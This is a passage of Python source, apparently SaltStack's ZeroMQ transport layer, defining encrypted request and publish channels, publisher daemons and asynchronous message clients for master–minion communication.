import tornado.gen
import tornado.concurrent

# Import third party libs
try:
    from M2Crypto import RSA
    HAS_M2 = True
except ImportError:
    HAS_M2 = False
try:
    from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
    from Crypto.Cipher import PKCS1_OAEP

log = logging.getLogger(__name__)


def _get_master_uri(master_ip,
                    master_port,
                    source_ip=None,
                    source_port=None):
    '''
    Return the ZeroMQ URI to connect the Minion to the Master.
    It supports different source IP / port, given the ZeroMQ syntax:

    // Connecting using a IP address and bind to an IP address
    rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555");
    assert (rc == 0);

    Source: http://api.zeromq.org/4-1:zmq-tcp
    '''
    if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
        # The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
        # which is included in the pyzmq wheels starting with 16.0.1.
        if source_ip or source_port:
            if source_ip and source_port:
                return 'tcp://{source_ip}:{source_port};{master_ip}:{master_port}'.format(
                    source_ip=source_ip, source_port=source_port,
                    master_ip=master_ip, master_port=master_port)
            elif source_ip and not source_port:
                return 'tcp://{source_ip}:0;{master_ip}:{master_port}'.format(
                    source_ip=source_ip,
                    master_ip=master_ip, master_port=master_port)
            elif not source_ip and source_port:
                return 'tcp://0.0.0.0:{source_port};{master_ip}:{master_port}'.format(
                    source_port=source_port,
                    master_ip=master_ip, master_port=master_port)
    if source_ip or source_port:
        log.warning('Unable to connect to the Master using a specific source IP / port')
        log.warning('Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6')
    return 'tcp://{master_ip}:{master_port}'.format(
        master_ip=master_ip, master_port=master_port)


class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
    '''
    Encapsulate sending routines to ZeroMQ.

    ZMQ Channels default to 'crypt=aes'
    '''
    # This class is only a singleton per minion/master pair
    # mapping of io_loop -> {key -> channel}
    instance_map = weakref.WeakKeyDictionary()

    def __new__(cls, opts, **kwargs):
        '''
        Only create one instance of channel per __key()
        '''
        # do we have any mapping for this io_loop
        io_loop = kwargs.get('io_loop')
        if io_loop is None:
            install_zmq()
            io_loop = ZMQDefaultLoop.current()
        if io_loop not in cls.instance_map:
            cls.instance_map[io_loop] = weakref.WeakValueDictionary()
        loop_instance_map = cls.instance_map[io_loop]

        key = cls.__key(opts, **kwargs)
        obj = loop_instance_map.get(key)
        if obj is None:
            log.debug('Initializing new AsyncZeroMQReqChannel for %s', key)
            # we need to make a local variable for this, as we are going to store
            # it in a WeakValueDictionary-- which will remove the item if no one
            # references it-- this forces a reference while we return to the caller
            obj = object.__new__(cls)
            obj.__singleton_init__(opts, **kwargs)
            loop_instance_map[key] = obj
            log.trace('Inserted key into loop_instance_map id %s for key %s and process %s',
                      id(loop_instance_map), key, os.getpid())
        else:
            log.debug('Re-using AsyncZeroMQReqChannel for %s', key)
        return obj

    def __deepcopy__(self, memo):
        cls = self.__class__
        result = cls.__new__(cls, copy.deepcopy(self.opts, memo))  # pylint: disable=too-many-function-args
        memo[id(self)] = result
        for key in self.__dict__:
            if key in ('_io_loop',):
                continue
                # The _io_loop has a thread Lock which will fail to be deep
                # copied. Skip it because it will just be recreated on the
                # new copy.
            if key == 'message_client':
                # Recreate the message client because it will fail to be deep
                # copied. The reason is the same as the io_loop skip above.
                setattr(result, key,
                        AsyncReqMessageClientPool(result.opts,
                                                  args=(result.opts, self.master_uri,),
                                                  kwargs={'io_loop': self._io_loop}))
                continue
            setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
        return result

    @classmethod
    def __key(cls, opts, **kwargs):
        return (opts['pki_dir'],     # where the keys are stored
                opts['id'],          # minion ID
                kwargs.get('master_uri', opts.get('master_uri')),  # master ID
                kwargs.get('crypt', 'aes'),  # TODO: use the same channel for crypt
                )

    # has to remain empty for singletons, since __init__ will *always* be called
    def __init__(self, opts, **kwargs):
        pass

    # an init for the singleton instance to call
    def __singleton_init__(self, opts, **kwargs):
        self.opts = dict(opts)
        self.ttype = 'zeromq'

        # crypt defaults to 'aes'
        self.crypt = kwargs.get('crypt', 'aes')

        if 'master_uri' in kwargs:
            self.opts['master_uri'] = kwargs['master_uri']

        self._io_loop = kwargs.get('io_loop')
        if self._io_loop is None:
            install_zmq()
            self._io_loop = ZMQDefaultLoop.current()

        if self.crypt != 'clear':
            # we don't need to worry about auth as a kwarg, since its a singleton
            self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
        log.debug('Connecting the Minion to the Master URI (for the return server): %s', self.opts['master_uri'])
        self.message_client = AsyncReqMessageClientPool(self.opts,
                                                        args=(self.opts, self.opts['master_uri'],),
                                                        kwargs={'io_loop': self._io_loop})

    def __del__(self):
        '''
        Since the message_client creates sockets and assigns them to the IOLoop we have to
        specifically destroy them, since we aren't the only ones with references to the FDs
        '''
        if hasattr(self, 'message_client'):
            self.message_client.destroy()
        else:
            log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')

    @property
    def master_uri(self):
        if 'master_ip' in self.opts:
            return _get_master_uri(self.opts['master_ip'],
                                   self.opts['master_port'],
                                   source_ip=self.opts.get('source_ip'),
                                   source_port=self.opts.get('source_ret_port'))
        return self.opts['master_uri']

    def _package_load(self, load):
        return {
            'enc': self.crypt,
            'load': load,
        }

    @tornado.gen.coroutine
    def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
        if not self.auth.authenticated:
            # Return control back to the caller, continue when authentication succeeds
            yield self.auth.authenticate()
        # Return control to the caller. When send() completes, resume by populating ret with the Future.result
        ret = yield self.message_client.send(
            self._package_load(self.auth.crypticle.dumps(load)),
            timeout=timeout,
            tries=tries,
        )
        key = self.auth.get_keys()
        if 'key' not in ret:
            # Reauth in the case our key is deleted on the master side.
            yield self.auth.authenticate()
            ret = yield self.message_client.send(
                self._package_load(self.auth.crypticle.dumps(load)),
                timeout=timeout,
                tries=tries,
            )
        if HAS_M2:
            aes = key.private_decrypt(ret['key'],
                                      RSA.pkcs1_oaep_padding)
        else:
            cipher = PKCS1_OAEP.new(key)
            aes = cipher.decrypt(ret['key'])
        pcrypt = salt.crypt.Crypticle(self.opts, aes)
        data = pcrypt.loads(ret[dictkey])
        if six.PY3:
            data = salt.transport.frame.decode_embedded_strs(data)
        raise tornado.gen.Return(data)

    @tornado.gen.coroutine
    def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
        '''
        Send a load across the wire, with encryption

        In case of authentication errors, try to renegotiate authentication
        and retry the method.

        Indeed, we can fail too early in case of a master restart during a
        minion state execution call

        :param dict load: A load to send across the wire
        :param int tries: The number of times to make before failure
        :param int timeout: The number of seconds on a response before failing
        '''
        @tornado.gen.coroutine
        def _do_transfer():
            # Yield control to the caller. When send() completes, resume by populating data with the Future.result
            data = yield self.message_client.send(
                self._package_load(self.auth.crypticle.dumps(load)),
                timeout=timeout,
                tries=tries,
            )
            # we may not have always data
            # as for example for saltcall ret submission, this is a blind
            # communication, we do not subscribe to return events, we just
            # upload the results to the master
            if data:
                data = self.auth.crypticle.loads(data, raw)
            if six.PY3 and not raw:
                data = salt.transport.frame.decode_embedded_strs(data)
            raise tornado.gen.Return(data)
        if not self.auth.authenticated:
            # Return control back to the caller, resume when authentication succeeds
            yield self.auth.authenticate()
        try:
            # We did not get data back the first time. Retry.
            ret = yield _do_transfer()
        except salt.crypt.AuthenticationError:
            # If auth error, return control back to the caller, continue when authentication succeeds
            yield self.auth.authenticate()
            ret = yield _do_transfer()
        raise tornado.gen.Return(ret)

    @tornado.gen.coroutine
    def _uncrypted_transfer(self, load, tries=3, timeout=60):
        '''
        Send a load across the wire in cleartext

        :param dict load: A load to send across the wire
        :param int tries: The number of times to make before failure
        :param int timeout: The number of seconds on a response before failing
        '''
        ret = yield self.message_client.send(
            self._package_load(load),
            timeout=timeout,
            tries=tries,
        )
        raise tornado.gen.Return(ret)

    @tornado.gen.coroutine
    def send(self, load, tries=3, timeout=60, raw=False):
        '''
        Send a request, return a future which will complete when we send the message
        '''
        if self.crypt == 'clear':
            ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
        else:
            ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw)
        raise tornado.gen.Return(ret)


class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
    '''
    A transport channel backed by ZeroMQ for a Salt Publisher to use to
    publish commands to connected minions
    '''
    def __init__(self,
                 opts,
                 **kwargs):
        self.opts = opts
        self.ttype = 'zeromq'
        self.io_loop = kwargs.get('io_loop')

        if self.io_loop is None:
            install_zmq()
            self.io_loop = ZMQDefaultLoop.current()

        self.hexid = hashlib.sha1(salt.utils.stringutils.to_bytes(self.opts['id'])).hexdigest()
        self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
        self.serial = salt.payload.Serial(self.opts)
        self.context = zmq.Context()
        self._socket = self.context.socket(zmq.SUB)

        if self.opts['zmq_filtering']:
            # TODO: constants file for "broadcast"
            self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast')
            if self.opts.get('__role') == 'syndic':
                self._socket.setsockopt(zmq.SUBSCRIBE, b'syndic')
            else:
                self._socket.setsockopt(
                    zmq.SUBSCRIBE,
                    salt.utils.stringutils.to_bytes(self.hexid)
                )
        else:
            self._socket.setsockopt(zmq.SUBSCRIBE, b'')

        self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id']))

        # TODO: cleanup all the socket opts stuff
        if hasattr(zmq, 'TCP_KEEPALIVE'):
            self._socket.setsockopt(
                zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
            )
            self._socket.setsockopt(
                zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
            )
            self._socket.setsockopt(
                zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
            )
            self._socket.setsockopt(
                zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
            )

        recon_delay = self.opts['recon_default']

        if self.opts['recon_randomize']:
            recon_delay = randint(self.opts['recon_default'],
                                  self.opts['recon_default'] + self.opts['recon_max'])

            log.debug(
                "Generated random reconnect delay between '%sms' and '%sms' (%s)",
                self.opts['recon_default'],
                self.opts['recon_default'] + self.opts['recon_max'],
                recon_delay
            )

        log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
        self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)

        if hasattr(zmq, 'RECONNECT_IVL_MAX'):
            log.debug(
                "Setting zmq_reconnect_ivl_max to '%sms'",
                self.opts['recon_default'] + self.opts['recon_max']
            )

            self._socket.setsockopt(
                zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
            )

        if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'):
            # IPv6 sockets work for both IPv6 and IPv4 addresses
            self._socket.setsockopt(zmq.IPV4ONLY, 0)

        if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
            self._monitor = ZeroMQSocketMonitor(self._socket)
            self._monitor.start_io_loop(self.io_loop)

    def destroy(self):
        if hasattr(self, '_monitor') and self._monitor is not None:
            self._monitor.stop()
            self._monitor = None
        if hasattr(self, '_stream'):
            if ZMQ_VERSION_INFO < (14, 3, 0):
                # stream.close() doesn't work properly on pyzmq < 14.3.0
                self._stream.io_loop.remove_handler(self._stream.socket)
                self._stream.socket.close(0)
            else:
                self._stream.close(0)
        elif hasattr(self, '_socket'):
            self._socket.close(0)
        if hasattr(self, 'context') and self.context.closed is False:
            self.context.term()

    def __del__(self):
        self.destroy()

    # TODO: this is the time to see if we are connected, maybe use the req channel to guess?
    @tornado.gen.coroutine
    def connect(self):
        if not self.auth.authenticated:
            yield self.auth.authenticate()

        # if this is changed from the default, we assume it was intentional
        if int(self.opts.get('publish_port', 4506)) != 4506:
            self.publish_port = self.opts.get('publish_port')
        # else take the relayed publish_port master reports
        else:
            self.publish_port = self.auth.creds['publish_port']

        log.debug('Connecting the Minion to the Master publish port, using the URI: %s', self.master_pub)
        self._socket.connect(self.master_pub)

    @property
    def master_pub(self):
        '''
        Return the master publish port
        '''
        return _get_master_uri(self.opts['master_ip'],
                               self.publish_port,
                               source_ip=self.opts.get('source_ip'),
                               source_port=self.opts.get('source_publish_port'))

    @tornado.gen.coroutine
    def _decode_messages(self, messages):
        '''
        Take the zmq messages, decrypt/decode them into a payload

        :param list messages: A list of messages to be decoded
        '''
        messages_len = len(messages)
        # if it was one message, then its old style
        if messages_len == 1:
            payload = self.serial.loads(messages[0])
        # 2 includes a header which says who should do it
        elif messages_len == 2:
            if (self.opts.get('__role') != 'syndic' and messages[0] not in ('broadcast', self.hexid)) or \
                    (self.opts.get('__role') == 'syndic' and messages[0] not in ('broadcast', 'syndic')):
                log.debug('Publish received for not this minion: %s', messages[0])
                raise tornado.gen.Return(None)
            payload = self.serial.loads(messages[1])
        else:
            # NOTE(review): formats len(messages_len) — len() of an int raises
            # TypeError while building the message; likely meant messages_len.
            raise Exception(('Invalid number of messages ({0}) in zeromq pub'
                             'message from master').format(len(messages_len)))
        # Yield control back to the caller. When the payload has been decoded, assign
        # the decoded payload to 'ret' and resume operation
        ret = yield self._decode_payload(payload)
        raise tornado.gen.Return(ret)

    @property
    def stream(self):
        '''
        Return the current zmqstream, creating one if necessary
        '''
        if not hasattr(self, '_stream'):
            self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
        return self._stream

    def on_recv(self, callback):
        '''
        Register a callback for received messages (that we didn't initiate)

        :param func callback: A function which should be called when data is received
        '''
        if callback is None:
            return self.stream.on_recv(None)

        @tornado.gen.coroutine
        def wrap_callback(messages):
            payload = yield self._decode_messages(messages)
            if payload is not None:
                callback(payload)
        return self.stream.on_recv(wrap_callback)


class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):

    def __init__(self, opts):
        salt.transport.server.ReqServerChannel.__init__(self, opts)
        self._closing = False

    def zmq_device(self):
        '''
        Multiprocessing target for the zmq queue device
        '''
        self.__setup_signals()
        salt.utils.process.appendproctitle('MWorkerQueue')
        self.context = zmq.Context(self.opts['worker_threads'])
        # Prepare the zeromq sockets
        self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
        self.clients = self.context.socket(zmq.ROUTER)
        if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
            # IPv6 sockets work for both IPv6 and IPv4 addresses
            self.clients.setsockopt(zmq.IPV4ONLY, 0)
        self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
        self._start_zmq_monitor()
        self.workers = self.context.socket(zmq.DEALER)

        if self.opts.get('ipc_mode', '') == 'tcp':
            self.w_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts.get('tcp_master_workers', 4515)
            )
        else:
            self.w_uri = 'ipc://{0}'.format(
                os.path.join(self.opts['sock_dir'], 'workers.ipc')
            )

        log.info('Setting up the master communication server')
        self.clients.bind(self.uri)
        self.workers.bind(self.w_uri)

        while True:
            if self.clients.closed or self.workers.closed:
                break
            try:
                zmq.device(zmq.QUEUE, self.clients, self.workers)
            except zmq.ZMQError as exc:
                if exc.errno == errno.EINTR:
                    continue
                raise exc
            except (KeyboardInterrupt, SystemExit):
                break

    def close(self):
        '''
        Cleanly shutdown the router socket
        '''
        if self._closing:
            return
        log.info('MWorkerQueue under PID %s is closing', os.getpid())
        self._closing = True
        # pylint: disable=E0203
        if getattr(self, '_monitor', None) is not None:
            self._monitor.stop()
            self._monitor = None
        if getattr(self, '_w_monitor', None) is not None:
            self._w_monitor.stop()
            self._w_monitor = None
        if hasattr(self, 'clients') and self.clients.closed is False:
            self.clients.close()
        if hasattr(self, 'workers') and self.workers.closed is False:
            self.workers.close()
        if hasattr(self, 'stream'):
            self.stream.close()
        if hasattr(self, '_socket') and self._socket.closed is False:
            self._socket.close()
        if hasattr(self, 'context') and self.context.closed is False:
            self.context.term()
        # pylint: enable=E0203

    def pre_fork(self, process_manager):
        '''
        Pre-fork we need to create the zmq router device

        :param func process_manager: An instance of salt.utils.process.ProcessManager
        '''
        salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
        process_manager.add_process(self.zmq_device)

    def _start_zmq_monitor(self):
        '''
        Starts ZMQ monitor for debugging purposes.
        :return:
        '''
        # Socket monitor shall be used the only for debug
        # purposes so using threading doesn't look too bad here
        if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
            log.debug('Starting ZMQ monitor')
            import threading
            self._w_monitor = ZeroMQSocketMonitor(self._socket)
            threading.Thread(target=self._w_monitor.start_poll).start()
            log.debug('ZMQ monitor has been started started')

    def post_fork(self, payload_handler, io_loop):
        '''
        After forking we need to create all of the local sockets to listen to the
        router

        :param func payload_handler: A function to called to handle incoming payloads as
                                     they are picked up off the wire
        :param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
        '''
        self.payload_handler = payload_handler
        self.io_loop = io_loop
        self.context = zmq.Context(1)
        self._socket = self.context.socket(zmq.REP)
        self._start_zmq_monitor()

        if self.opts.get('ipc_mode', '') == 'tcp':
            self.w_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts.get('tcp_master_workers', 4515)
            )
        else:
            self.w_uri = 'ipc://{0}'.format(
                os.path.join(self.opts['sock_dir'], 'workers.ipc')
            )
        log.info('Worker binding to socket %s', self.w_uri)
        self._socket.connect(self.w_uri)

        salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)

        self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
        self.stream.on_recv_stream(self.handle_message)

    @tornado.gen.coroutine
    def handle_message(self, stream, payload):
        '''
        Handle incoming messages from underlying TCP streams

        :stream ZMQStream stream: A ZeroMQ stream.
        See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html

        :param dict payload: A payload to process
        '''
        try:
            payload = self.serial.loads(payload[0])
            payload = self._decode_payload(payload)
        except Exception as exc:
            exc_type = type(exc).__name__
            if exc_type == 'AuthenticationError':
                log.debug(
                    'Minion failed to auth to master. Since the payload is '
                    'encrypted, it is not known which minion failed to '
                    'authenticate. It is likely that this is a transient '
                    'failure due to the master rotating its public key.'
                )
            else:
                log.error('Bad load from minion: %s: %s', exc_type, exc)
            stream.send(self.serial.dumps('bad load'))
            raise tornado.gen.Return()

        # TODO helper functions to normalize payload?
        if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
            log.error('payload and load must be a dict. Payload was: %s and load was %s',
                      payload, payload.get('load'))
            stream.send(self.serial.dumps('payload and load must be a dict'))
            raise tornado.gen.Return()

        try:
            id_ = payload['load'].get('id', '')
            if str('\0') in id_:
                log.error('Payload contains an id with a null byte: %s', payload)
                stream.send(self.serial.dumps('bad load: id contains a null byte'))
                raise tornado.gen.Return()
        except TypeError:
            log.error('Payload contains non-string id: %s', payload)
            stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
            raise tornado.gen.Return()

        # intercept the "_auth" commands, since the main daemon shouldn't know
        # anything about our key auth
        if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
            stream.send(self.serial.dumps(self._auth(payload['load'])))
            raise tornado.gen.Return()

        # TODO: test
        try:
            # Take the payload_handler function that was registered when we created the channel
            # and call it, returning control to the caller until it completes
            ret, req_opts = yield self.payload_handler(payload)
        except Exception as e:
            # always attempt to return an error to the minion
            stream.send('Some exception handling minion payload')
            log.error('Some exception handling a payload from minion', exc_info=True)
            raise tornado.gen.Return()

        req_fun = req_opts.get('fun', 'send')
        if req_fun == 'send_clear':
            stream.send(self.serial.dumps(ret))
        elif req_fun == 'send':
            stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
        elif req_fun == 'send_private':
            stream.send(self.serial.dumps(self._encrypt_private(ret,
                                                                req_opts['key'],
                                                                req_opts['tgt'],
                                                                )))
        else:
            log.error('Unknown req_fun %s', req_fun)
            # always attempt to return an error to the minion
            stream.send('Server-side exception handling payload')
        raise tornado.gen.Return()

    def __setup_signals(self):
        signal.signal(signal.SIGINT, self._handle_signals)
        signal.signal(signal.SIGTERM, self._handle_signals)

    def _handle_signals(self, signum, sigframe):
        msg = '{0} received a '.format(self.__class__.__name__)
        if signum == signal.SIGINT:
            msg += 'SIGINT'
        elif signum == signal.SIGTERM:
            msg += 'SIGTERM'
        msg += '. Exiting'
        log.debug(msg)
        self.close()
        sys.exit(salt.defaults.exitcodes.EX_OK)


def _set_tcp_keepalive(zmq_socket, opts):
    '''
    Ensure that TCP keepalives are set as specified in "opts".

    Warning: Failure to set TCP keepalives on the salt-master can result in
    not detecting the loss of a minion when the connection is lost or when
    it's host has been terminated without first closing the socket.
    Salt's Presence System depends on this connection status to know if a minion
    is "present".

    Warning: Failure to set TCP keepalives on minions can result in frequent or
    unexpected disconnects!
    '''
    if hasattr(zmq, 'TCP_KEEPALIVE') and opts:
        if 'tcp_keepalive' in opts:
            zmq_socket.setsockopt(
                zmq.TCP_KEEPALIVE, opts['tcp_keepalive']
            )
        if 'tcp_keepalive_idle' in opts:
            zmq_socket.setsockopt(
                zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle']
            )
        if 'tcp_keepalive_cnt' in opts:
            zmq_socket.setsockopt(
                zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt']
            )
        if 'tcp_keepalive_intvl' in opts:
            zmq_socket.setsockopt(
                zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl']
            )


class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
    '''
    Encapsulate synchronous operations for a publisher channel
    '''
    def __init__(self, opts):
        self.opts = opts
        self.serial = salt.payload.Serial(self.opts)  # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts) def connect(self): return tornado.gen.sleep(5) def _publish_daemon(self): ''' Bind to the interface specified in the configuration file ''' salt.utils.process.appendproctitle(self.__class__.__name__) # Set up the context context = zmq.Context(1) # Prepare minion publish socket pub_sock = context.socket(zmq.PUB) _set_tcp_keepalive(pub_sock, self.opts) # if 2.1 >= zmq < 3.0, we only have one HWM setting try: pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000)) # in zmq >= 3.0, there are separate send and receive HWM settings except AttributeError: # Set the High Water Marks. For more information on HWM, see: # http://api.zeromq.org/4-1:zmq-setsockopt pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000)) pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000)) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses pub_sock.setsockopt(zmq.IPV4ONLY, 0) pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000)) pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts) # Prepare minion pull socket pull_sock = context.socket(zmq.PULL) if self.opts.get('ipc_mode', '') == 'tcp': pull_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_publish_pull', 4514) ) else: pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) salt.utils.zeromq.check_ipc_path_max_len(pull_uri) # Start the minion command publisher log.info('Starting the Salt Publisher on %s', pub_uri) pub_sock.bind(pub_uri) # Securely create socket log.info('Starting the Salt Puller on %s', pull_uri) with salt.utils.files.set_umask(0o177): pull_sock.bind(pull_uri) try: while True: # Catch and handle EINTR from when this process is sent # SIGUSR1 gracefully so we don't choke and die horribly try: log.trace('Getting data from puller %s', pull_uri) package = pull_sock.recv() unpacked_package = salt.payload.unpackage(package) 
if six.PY3: unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package) payload = unpacked_package['payload'] log.trace('Accepted unpacked package from puller') if self.opts['zmq_filtering']: # if you have a specific topic list, use that if 'topic_lst' in unpacked_package: for topic in unpacked_package['topic_lst']: log.trace('Sending filtered data over publisher %s', pub_uri) # zmq filters are substring match, hash the topic # to avoid collisions htopic = salt.utils.stringutils.to_bytes(hashlib.sha1(topic).hexdigest()) pub_sock.send(htopic, flags=zmq.SNDMORE) pub_sock.send(payload) log.trace('Filtered data has been sent') # Syndic broadcast if self.opts.get('order_masters'): log.trace('Sending filtered data to syndic') pub_sock.send(b'syndic', flags=zmq.SNDMORE) pub_sock.send(payload) log.trace('Filtered data has been sent to syndic') # otherwise its a broadcast else: # TODO: constants file for "broadcast" log.trace('Sending broadcasted data over publisher %s', pub_uri) pub_sock.send(b'broadcast', flags=zmq.SNDMORE) pub_sock.send(payload) log.trace('Broadcasted data has been sent') else: log.trace('Sending ZMQ-unfiltered data over publisher %s', pub_uri) pub_sock.send(payload) log.trace('Unfiltered data has been sent') except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except KeyboardInterrupt: # Cleanly close the sockets if we're shutting down if pub_sock.closed is False: pub_sock.setsockopt(zmq.LINGER, 1) pub_sock.close() if pull_sock.closed is False: pull_sock.setsockopt(zmq.LINGER, 1) pull_sock.close() if context.closed is False: context.term() def pre_fork(self, process_manager): ''' Do anything necessary pre-fork. 
Since this is on the master side this will primarily be used to create IPC channels and create our daemon process to do the actual publishing :param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager ''' process_manager.add_process(self._publish_daemon) def publish(self, load): ''' Publish "load" to minions :param dict load: A load to be sent across the wire to minions ''' payload = {'enc': 'aes'} crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value) payload['load'] = crypticle.dumps(load) if self.opts['sign_pub_messages']: master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem') log.debug("Signing data packet") payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load']) # Send 0MQ to the publisher context = zmq.Context(1) pub_sock = context.socket(zmq.PUSH) if self.opts.get('ipc_mode', '') == 'tcp': pull_uri = 'tcp://127.0.0.1:{0}'.format( self.opts.get('tcp_master_publish_pull', 4514) ) else: pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) pub_sock.connect(pull_uri) int_payload = {'payload': self.serial.dumps(payload)} # add some targeting stuff for lists only (for now) if load['tgt_type'] == 'list': int_payload['topic_lst'] = load['tgt'] # If zmq_filtering is enabled, target matching has to happen master side match_targets = ["pcre", "glob", "list"] if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets: # Fetch a list of minions that match _res = self.ckminions.check_minions(load['tgt'], tgt_type=load['tgt_type']) match_ids = _res['minions'] log.debug("Publish Side Match: %s", match_ids) # Send list of miions thru so zmq can target them int_payload['topic_lst'] = match_ids pub_sock.send(self.serial.dumps(int_payload)) pub_sock.close() context.term() class AsyncReqMessageClientPool(salt.transport.MessageClientPool): ''' Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to 
socket. ''' def __init__(self, opts, args=None, kwargs=None): super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs) def __del__(self): self.destroy() def destroy(self): for message_client in self.message_clients: message_client.destroy() self.message_clients = [] def send(self, *args, **kwargs): message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue)) return message_clients[0].send(*args, **kwargs) # TODO: unit tests! class AsyncReqMessageClient(object): ''' This class wraps the underlying zeromq REQ socket and gives a future-based interface to sending and recieving messages. This works around the primary limitation of serialized send/recv on the underlying socket by queueing the message sends in this class. In the future if we decide to attempt to multiplex we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial ''' def __init__(self, opts, addr, linger=0, io_loop=None): ''' Create an asynchronous message client :param dict opts: The salt opts dictionary :param str addr: The interface IP address to bind to :param int linger: The number of seconds to linger on a ZMQ socket. 
See http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER] :param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop] ''' self.opts = opts self.addr = addr self.linger = linger if io_loop is None: install_zmq() ZMQDefaultLoop.current() else: self.io_loop = io_loop self.serial = salt.payload.Serial(self.opts) self.context = zmq.Context() # wire up sockets self._init_socket() self.send_queue = [] # mapping of message -> future self.send_future_map = {} self.send_timeout_map = {} # message -> timeout # TODO: timeout all in-flight sessions, or error def destroy(self): if hasattr(self, 'stream') and self.stream is not None: if ZMQ_VERSION_INFO < (14, 3, 0): # stream.close() doesn't work properly on pyzmq < 14.3.0 if self.stream.socket: self.stream.socket.close() self.stream.io_loop.remove_handler(self.stream.socket) # set this to None, more hacks for messed up pyzmq self.stream.socket = None self.socket.close() else: self.stream.close() self.socket = None self.stream = None if self.context.closed is False: self.context.term() def __del__(self): self.destroy() def _init_socket(self): if hasattr(self, 'stream'): self.stream.close() # pylint: disable=E0203 self.socket.close() # pylint: disable=E0203 del self.stream del self.socket self.socket = self.context.socket(zmq.REQ) # socket options if hasattr(zmq, 'RECONNECT_IVL_MAX'): self.socket.setsockopt( zmq.RECONNECT_IVL_MAX, 5000 ) _set_tcp_keepalive(self.socket, self.opts) if self.addr.startswith('tcp://['): # Hint PF type if bracket enclosed IPv6 address if hasattr(zmq, 'IPV6'): self.socket.setsockopt(zmq.IPV6, 1) elif hasattr(zmq, 'IPV4ONLY'): self.socket.setsockopt(zmq.IPV4ONLY, 0) self.socket.linger = self.linger log.debug('Trying to connect to: %s', self.addr) self.socket.connect(self.addr) self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop) @tornado.gen.coroutine def _internal_send_recv(self): while len(self.send_queue) > 0: message = self.send_queue[0] future = 
